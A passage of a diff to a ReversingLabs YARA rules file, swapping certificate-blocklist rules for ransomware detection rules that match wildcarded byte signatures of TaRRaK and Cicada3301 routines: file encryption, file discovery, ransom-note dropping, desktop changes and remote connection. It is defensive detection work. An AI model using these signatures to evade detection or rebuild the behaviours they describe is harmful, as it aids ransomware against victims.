+            ?? FF 75 ?? 8D 45 ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 E9 ?? ?? ?? ?? FF 75 ?? 8D
+            45 ?? 57 56 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 45 ?? 8B 0C 85 ?? ?? ?? ?? 8B 45 ??
+            80 7C 01 ?? ?? 7D ?? 0F BE C3 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 0F 85 ?? ?? ??
+            ?? FF 75 ?? 8D 45 ?? 57 56 50 E8 ?? ?? ?? ?? EB ?? FF 75 ?? 8D 45 ?? 57 56 50 E8 ??
+            ?? ?? ?? EB ?? FF 75 ?? 8D 45 ?? 57 56 50 E8 ?? ?? ?? ?? EB ?? 8B 4C 01 ?? 8D 7D ??
+            33 C0 AB 6A ?? AB AB 8D 45 ?? 50 FF 75 ?? FF 75 ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ??
+            FF 15 ?? ?? ?? ?? 89 45 ?? 8D 75 ?? 8D 7D ?? A5 A5 A5 8B 45 ?? 85 C0 75 ?? 8B 45 ??
+            85 C0 74 ?? 6A ?? 5E 3B C6 75 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89
+            30 E9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 E9 ?? ?? ?? ?? 8B 7D ?? 8B 45 ?? 8B 4D ?? 8B
+            04 85 ?? ?? ?? ?? F6 44 08 ?? ?? 74 ?? 80 3F ?? 74 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 20 ?? E9 ?? ?? ?? ?? 2B 45 ?? EB ?? 33 C0 5F 5E 5B C9 C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "P2N ONLINE LTD" and pe.signatures [ i ] . serial == "61:da:67:6c:1d:cf:cf:18:82:76:e2:c7:0d:68:08:2e" and 1552723954 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $inject_code_into_process ) and ( all of ( $find_files_p* ) ) and ( $encrypt_files ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_767436921B2698Bd18400A24B01341B6 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Tarrak : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects TaRRaK ransomware."
 		author = "ReversingLabs"
-		id = "3e3b2b75-9416-5c4f-ad47-88f92039f532"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "a783df87-0c9b-5868-9af0-c32b11e8b71b"
+		date = "2021-09-06"
+		modified = "2021-09-06"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3158-L3174"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "759bbbc5929463ad68d5dcd28b30401b9ff680f522172ed8d5d7dd3772e07587"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.TaRRaK.yara#L1-L96"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a8c4c4a501d94da94ae4a2e1eb2846e841249659be64dd45f46584885d000635"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "TaRRaK"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            03 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 73 ?? ?? ?? ?? 0D 09 08 28 ?? ?? ?? ?? 7D
+            ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ??
+            02 08 28 ?? ?? ?? ?? 07 17 58 0B 07 06 8E 69 32 ?? DE ?? 26 DE ?? 00 03 28 ?? ?? ?? ??
+            0A 16 0B 2B ?? 06 07 9A 13 ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 02 11 ?? 28 ?? ?? ?? ??
+            07 17 58 0B 07 06 8E 69 32 ?? DE ?? 26 DE ?? 2A
+        }
+		$encrypt_files_p2 = {
+            03 8E 69 17 59 0A 06 17 2F ?? 03 2A 03 06 95 0B 16 0D 1C 1F ?? 06 17 58 5B 58 13 ?? 2B
+            ?? 09 20 ?? ?? ?? ?? 58 0D 09 18 64 19 5F 13 ?? 16 13 ?? 2B ?? 03 11 ?? 17 58 95 0C 03
+            11 ?? 8F ?? ?? ?? ?? 25 4B 02 09 08 07 11 ?? 11 ?? 04 28 ?? ?? ?? ?? 58 25 13 ?? 54 11
+            ?? 0B 11 ?? 17 58 13 ?? 11 ?? 06 32 ?? 03 16 95 0C 03 06 8F ?? ?? ?? ?? 25 4B 02 09 08
+            07 11 ?? 11 ?? 04 28 ?? ?? ?? ?? 58 25 13 ?? 54 11 ?? 0B 16 11 ?? 25 17 59 13 ?? 32 ??
+            03 2A
+        }
+		$encrypt_files_p3 = {
+            05 1B 64 04 18 62 61 04 19 64 05 1A 62 61 58 03 04 61 0E ?? 0E ?? 19 5F 6A 0E ?? 6E 61
+            D4 95 05 61 58 61 2A
+        }
+		$encrypt_files_p4 = {
+            03 8E 2D ?? 03 2A 02 02 02 03 17 28 ?? ?? ?? ?? 02 02 7B ?? ?? ?? ?? 16 28 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2A
+        }
+		$find_files_p1 = {
+            73 ?? ?? ?? ?? 25 02 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25
+            2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 2A
+        }
+		$find_files_p2 = {
+            73 ?? ?? ?? ?? 25 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 1B 28 ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 25 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 1F
+            ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A
+        }
+		$change_desktop = {
+            1F ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 28 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 17
+            8C ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 8C ?? ?? ?? ?? 6F ?? ?? ?? ?? 1F ?? 16
+            06 19 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? 2A
+        }
+		$drop_ransom_note = {
+            02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 2A 00 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 02 7B ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 0D 12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 06 6F ?? ?? ?? ?? 26 07 6F ??
+            ?? ?? ?? 26 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ??
+            2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 07 11 ?? 6F ?? ?? ?? ?? 26 12 ?? 28 ?? ?? ?? ?? 2D ??
+            DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 07 6F ?? ?? ?? ?? 0C 02 28 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 02 7B ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 06 28 ?? ?? ?? ?? 11 ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ?? ?? ?? ?? DE ??
+            26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE ?? 26
+            DE ?? 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REBROSE LEISURE LIMITED" and pe.signatures [ i ] . serial == "76:74:36:92:1b:26:98:bd:18:40:0a:24:b0:13:41:b6" and 1556284480 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $change_desktop ) and ( $drop_ransom_note )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_3E795531B3265510F935187Eca59920A : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Cicada3301 : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Cicada3301 ransomware."
 		author = "ReversingLabs"
-		id = "953434f4-cc19-5a0a-923b-4deaadacef00"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "c1a60870-0b68-5f2f-a74f-34e493a5e251"
+		date = "2024-10-09"
+		modified = "2024-10-09"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3176-L3192"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d597e88314f9f20283b40058dd74167d0d72f7518277a57f26c15e44b670b386"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Cicada3301.yara#L1-L309"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "9479667fd4c7f865607ece6af985ab6fa7b62f98738c338e4155059551db8a21"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Cicada3301"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$get_valid_drives = {
+            55 89 E5 53 57 56 83 EC ?? A1 ?? ?? ?? ?? 0F B6 00 6A ?? 6A ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 0F 28 0D ?? ?? ?? ?? 0F 28 15 ?? ??
+            ?? ?? 89 C6 0F 11 00 0F 11 48 ?? 0F 28 0D ?? ?? ?? ?? 0F 11 50 ?? 0F 28 15 ?? ?? ??
+            ?? 0F 11 48 ?? 0F 28 0D ?? ?? ?? ?? 0F 11 50 ?? 0F 11 48 ?? C7 40 ?? ?? ?? ?? ?? C7
+            40 ?? ?? ?? ?? ?? 83 C0 ?? 8D 4D ?? 50 56 51 E8 ?? ?? ?? ?? 83 C4 ?? 80 7D ?? ?? 0F
+            84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7D ?? 89 45 ?? 83 FF ?? 0F 82 ?? ?? ?? ?? 8B 5D ??
+            8D 04 7F 89 75 ?? 89 7D ?? 8D 74 83 ?? 66 2E 0F 1F 84 00 ?? ?? ?? ?? 90 57 6A ?? 8D
+            45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 8D 4F ?? 39 D1 0F 83 ?? ?? ?? ?? 39 D0 0F
+            83 ?? ?? ?? ?? 8B 56 ?? 8D 04 40 89 CF 89 55 ?? F2 0F 10 06 F2 0F 11 45 ?? 8B 54 83
+            ?? F2 0F 10 04 83 F2 0F 11 06 89 56 ?? 83 C6 ?? 83 F9 ?? 8B 55 ?? 89 54 83 ?? F2 0F
+            10 45 ?? F2 0F 11 04 83 77 ?? 8B 45 ?? 8B 75 ?? FF 08 75 ?? FF 48 ?? 75 ?? 6A ?? 68
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 7D ?? 8B 45 ?? F2 0F 10 45 ?? 89 47 ?? F2
+            0F 11 07 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 F8 83 C4 ?? 5E 5F 5B 5D C3
+        }
+		$collect_files_recursively_p1 = {
+            55 89 E5 53 57 56 83 E4 ?? 81 EC ?? ?? ?? ?? 8B 4D ?? 8B 7D ?? 8B 75 ?? 8B 45 ?? 89
+            4C 24 ?? 89 44 24 ?? 57 56 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 84 C0 0F 84 ?? ?? ?? ??
+            8D 9C 24 ?? ?? ?? ?? 57 56 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 BC 24 ?? ?? ?? ?? ?? 75 ??
+            8B 84 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ??
+            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            53 56 E8 ?? ?? ?? ?? 83 C4 ?? 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 7D ?? 8B
+            5D ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 04 FB C7
+            84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 84 24 ?? ?? ?? ??
+            8D 8C 24 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 0F
+            84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D B4 24 ?? ?? ?? ?? 56 E8 ??
+            ?? ?? ?? 83 C4 ?? 56 8D 74 24 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4
+            ?? 52 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B BC 24 ?? ?? ?? ?? 8B 9C
+            24 ?? ?? ?? ?? 85 FF 89 FA 0F 44 D3 8D 8C 24 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 FF 74 ?? 85 DB 74 ??
+            6A ?? 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 84 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 7D
+            ?? 89 44 24 ?? 89 0C 24 EB ?? 66 90 83 C7 ?? 80 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 3B BC
+        }
+		$collect_files_recursively_p2 = {
+            24 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 77 ?? FF 37 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? FF 34 24 FF 74 24 ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 74 24 ?? FF 74 24
+            ?? 56 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 80 BC 24 ?? ?? ?? ?? ?? 0F 84
+            ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? F2 0F 10 84 24 ?? ?? ?? ?? F2 0F 10 94 24 ?? ?? ??
+            ?? F2 0F 10 8C 24 ?? ?? ?? ?? 8B 5C 24 ?? 89 84 24 ?? ?? ?? ?? F2 0F 11 84 24 ?? ??
+            ?? ?? F2 0F 11 8C 24 ?? ?? ?? ?? F2 0F 11 94 24 ?? ?? ?? ?? FF 74 24 ?? 53 8D 84 24
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 88 44 24 ?? 8B 44 24 ?? 85 C0 74 ?? 6A ?? 50
+            53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 85 C0 74 ?? 6A ?? 50 56 E8 ?? ?? ?? ?? 83 C4
+            ?? 8B 84 24 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 50 FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 8B B4 24 ?? ?? ?? ?? 85 F6 74 ?? 8B 9C 24 ?? ?? ?? ?? 83 C3 ?? EB ?? 66 2E 0F
+            1F 84 00 ?? ?? ?? ?? 90 83 C3 ?? 4E 74 ?? 83 7B ?? ?? 72 ?? 8B 03 85 C0 74 ?? C1 E0
+            ?? 6A ?? 50 FF 73 ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 66 2E 0F 1F 84 00 ?? ?? ?? ?? 90
+            8B 84 24 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C1 E0 ?? 6A ?? 50 FF B4 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 8D 44 24 ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? 8D 44 24 ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 8B 5C 24 ?? 89 44 24 ?? 89 54 24 ?? 85 DB 0F 84 ?? ?? ?? ?? 83 FB ?? 0F
+            85 ?? ?? ?? ?? 8B 74 24 ?? F0 FF 86 ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F
+            1F 44 00 ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 52 50 8D 84 24 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 8B 84 24 ?? ?? ?? ?? 83 F0 ?? 0B 84 24 ?? ?? ?? ?? 75 ?? 8B 84
+            24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? EB
+        }
+		$collect_files_recursively_p3 = {
+            8D 94 24 ?? ?? ?? ?? 8D 9C 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 D7 89 DE F3 A5 8B 84 24
+            ?? ?? ?? ?? 83 F0 ?? 0B 84 24 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 80 BC 24 ?? ?? ?? ?? ??
+            0F 85 ?? ?? ?? ?? 8B BC 24 ?? ?? ?? ?? 8B 77 ?? 8B 1F 8B 06 53 FF D0 83 C4 ?? 8B 46
+            ?? 85 C0 74 ?? FF 76 ?? 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 57 E8 ?? ?? ?? ??
+            83 C4 ?? EB ?? 8B 74 24 ?? F0 FF 86 ?? ?? ?? ?? 7F ?? E9 ?? ?? ?? ?? 8B 74 24 ?? F0
+            FF 06 0F 8E ?? ?? ?? ?? 89 5C 24 ?? 89 74 24 ?? FF 75 ?? 8D BC 24 ?? ?? ?? ?? 57 E8
+            ?? ?? ?? ?? 83 C4 ?? 57 56 53 FF 75 ?? FF 75 ?? FF 74 24 ?? FF 74 24 ?? 8D 84 24 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 84 24 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B
+            84 24 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 50 FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            8B 44 24 ?? 85 C0 74 ?? 6A ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 84 24 ?? ??
+            ?? ?? F0 FF 08 0F 85 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 DF 89 D6 F3 A5 53 E8 ?? ?? ?? ?? 83 C4 ?? 09 D0 0F 84
+            ?? ?? ?? ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 85
+            C0 74 ?? 52 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 31 DB 83 7C 24 ?? ?? 75 ?? 8B
+            5C 24 ?? 8B 7C 24 ?? EB ?? 8B BC 24 ?? ?? ?? ?? 31 DB 85 DB B8 ?? ?? ?? ?? 89 BC 24
+            ?? ?? ?? ?? 0F 44 FB 0F 44 D8 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 52 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 52 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            83 7C 24 ?? ?? 8B 4C 24 ?? 0F 85 ?? ?? ?? ?? 8B 74 24 ?? 89 C8 83 F8 ?? 0F 82 ?? ??
+            ?? ?? 89 4C 24 ?? 8B 0E BA ?? ?? ?? ?? 31 D1 0F B6 56 ?? 83 F2 ?? 09 CA 0F 85 ?? ??
+            ?? ?? 83 C0 ?? 8D 4E ?? 50 51 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 80 7C 24
+        }
+		$collect_files_recursively_p4 = {
+            0F 85 ?? ?? ?? ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 89 C1 85 C0 74 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 50 51 89 4C 24 ?? E8 ??
+            ?? ?? ?? 8B 0C 24 89 44 24 ?? 51 E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 74 ?? 81 7C 24 ?? ??
+            ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 52 50 8D 44 24 ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7C 24 ?? ?? 8B 4C 24 ?? 8B 54 24 ?? B8 ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 0F 45 C8 B8 ??
+            ?? ?? ?? 0F 45 D0 8D 84 24 ?? ?? ?? ?? 89 0C 24 89 44 24 ?? 8D 44 24 ?? 89 54 24 ??
+            C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 8B 0C 24 8B 54 24 ?? 89 44 24 ?? 8B 44 24
+            ?? 89 54 24 ?? 89 84 24 ?? ?? ?? ?? 89 C8 29 D0 BA ?? ?? ?? ?? 72 ?? 03 44 24 ?? FF
+            74 24 ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 8B 54 24 ?? 85 C0 B8 ??
+            ?? ?? ?? 0F 45 D0 8B 84 24 ?? ?? ?? ?? 89 54 24 ?? 85 C0 74 ?? 6A ?? 50 FF 74 24 ??
+            E8 ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? 83 C4 ?? 89 C8 29 D0 89 44 24 ?? 50 8B 44 24
+            ?? 50 51 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 84 24 ?? ?? ?? ??
+            3C ?? 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 8B 7C 24 ?? BE ?? ?? ?? ?? 39 04 24 74 ?? 85 FF
+            0F 88 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F B6 00 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 89 C6 85
+            C0 0F 84 ?? ?? ?? ?? 57 FF 74 24 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 74 24 ?? 89 7C 24
+            ?? 89 7C 24 ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4
+        }
+		$collect_files_recursively_p5 = {
+            8B 7C 24 ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 74 24 ?? 56 E8
+            ?? ?? ?? ?? 83 C4 ?? 56 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 0F 85 ??
+            ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 74 24 ?? 85 DB 89 44 24 ?? 89 0C 24 74 ?? 6A ??
+            53 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? EB ?? 31 C0 BE ?? ?? ?? ?? 83 F8 ?? 0F 83 ?? ?? ?? ?? 89 44
+            24 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ??
+            ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F2 0F 10 44 24 ?? 8B 44
+            24 ?? F2 0F 11 44 24 ?? 39 C7 89 44 24 ?? 8B 4C 24 ?? 89 0C 24 75 ?? 57 FF 74 24 ??
+            53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 7C 24 ?? ?? 75 ?? 8B 06 8B 76 ?? B9 ?? ??
+            ?? ?? BA ?? ?? ?? ?? 31 C8 31 D6 09 C6 74 ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            52 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 8B 5C
+            24 ?? 8B 7C 24 ?? 85 FF 0F 84 ?? ?? ?? ?? 0F 88 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F B6 00
+            6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 89 C6 85 C0 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 44
+        }
+		$collect_files_recursively_p6 = {
+            24 ?? 85 C0 74 ?? 6A ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 66 2E 0F 1F 84 00 ??
+            ?? ?? ?? 0F 1F 44 00 ?? 8B 84 24 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 50 FF 74 24 ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 85 C0 74 ?? 6A ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 8B 84 24 ?? ?? ?? ?? F0 FF 08 0F 85 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 31 FF BB ?? ?? ?? ?? 85 FF 0F 85 ?? ?? ?? ?? BE ?? ??
+            ?? ?? 57 89 5C 24 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 74 24 ?? 89 7C 24 ?? 89 7C 24
